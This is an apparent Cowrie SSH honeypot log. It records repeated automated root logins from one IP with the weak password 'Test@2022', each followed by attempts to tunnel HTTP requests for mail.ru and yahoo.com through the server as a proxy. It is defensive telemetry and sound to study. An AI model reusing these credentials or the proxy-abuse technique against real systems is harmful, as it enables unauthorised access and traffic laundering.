{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.252505Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.517305Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5820,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:5820","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.571233Z","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.624452Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":31845,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:31845","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.771522Z","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.824742Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":27649,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:27649","sensor":"my-vps","timestamp":"2025-08-31T03:50:11.971485Z","session":"f9924ec13276"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.024662Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.078914Z","src_ip":"77.83.207.83","session":"f9924ec13276"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14196,"dst_ip":"1.2.3.4","dst_port":22,"session":"4872493dc289","protocol":"ssh","message":"New connection: 77.83.207.83:14196 (1.2.3.4:22) [session: 4872493dc289]","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.128166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.128932Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.179595Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.431391Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23308,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:23308","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.483634Z","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.534311Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7671,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7671","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.676872Z","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.727292Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6250,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6250","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.868951Z","session":"4872493dc289"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.919608Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:12.971371Z","src_ip":"77.83.207.83","session":"4872493dc289"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14310,"dst_ip":"1.2.3.4","dst_port":22,"session":"080876eaf79b","protocol":"ssh","message":"New connection: 77.83.207.83:14310 (1.2.3.4:22) [session: 080876eaf79b]","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.022878Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.024350Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.077072Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.338394Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13472,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13472","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.392410Z","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.444960Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":677,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:677","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.590921Z","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.643461Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":9853,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9853","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.791137Z","session":"080876eaf79b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.843780Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.897478Z","src_ip":"77.83.207.83","session":"080876eaf79b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14441,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5a4755a67f9","protocol":"ssh","message":"New connection: 77.83.207.83:14441 (1.2.3.4:22) [session: c5a4755a67f9]","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.945920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.947204Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:13.997489Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.246395Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13434,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13434","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.297975Z","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.348159Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":21834,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21834","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.488316Z","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.538288Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":6028,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6028","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.680449Z","session":"c5a4755a67f9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.730383Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.781069Z","src_ip":"77.83.207.83","session":"c5a4755a67f9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":14564,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2bb3489e9ad","protocol":"ssh","message":"New connection: 77.83.207.83:14564 (1.2.3.4:22) [session: d2bb3489e9ad]","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.831567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.841509Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:14.883066Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.138097Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17128,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17128","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.190573Z","session":"d2bb3489e9ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.241765Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24827,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:24827","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.385913Z","session":"d2bb3489e9ad"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.437227Z","src_ip":"77.83.207.83","session":"d2bb3489e9ad"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":4763,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4763","sensor":"my-vps","timestamp":"2025-08-31T03:50:15.581431Z","session":"d2bb3489e9ad"}
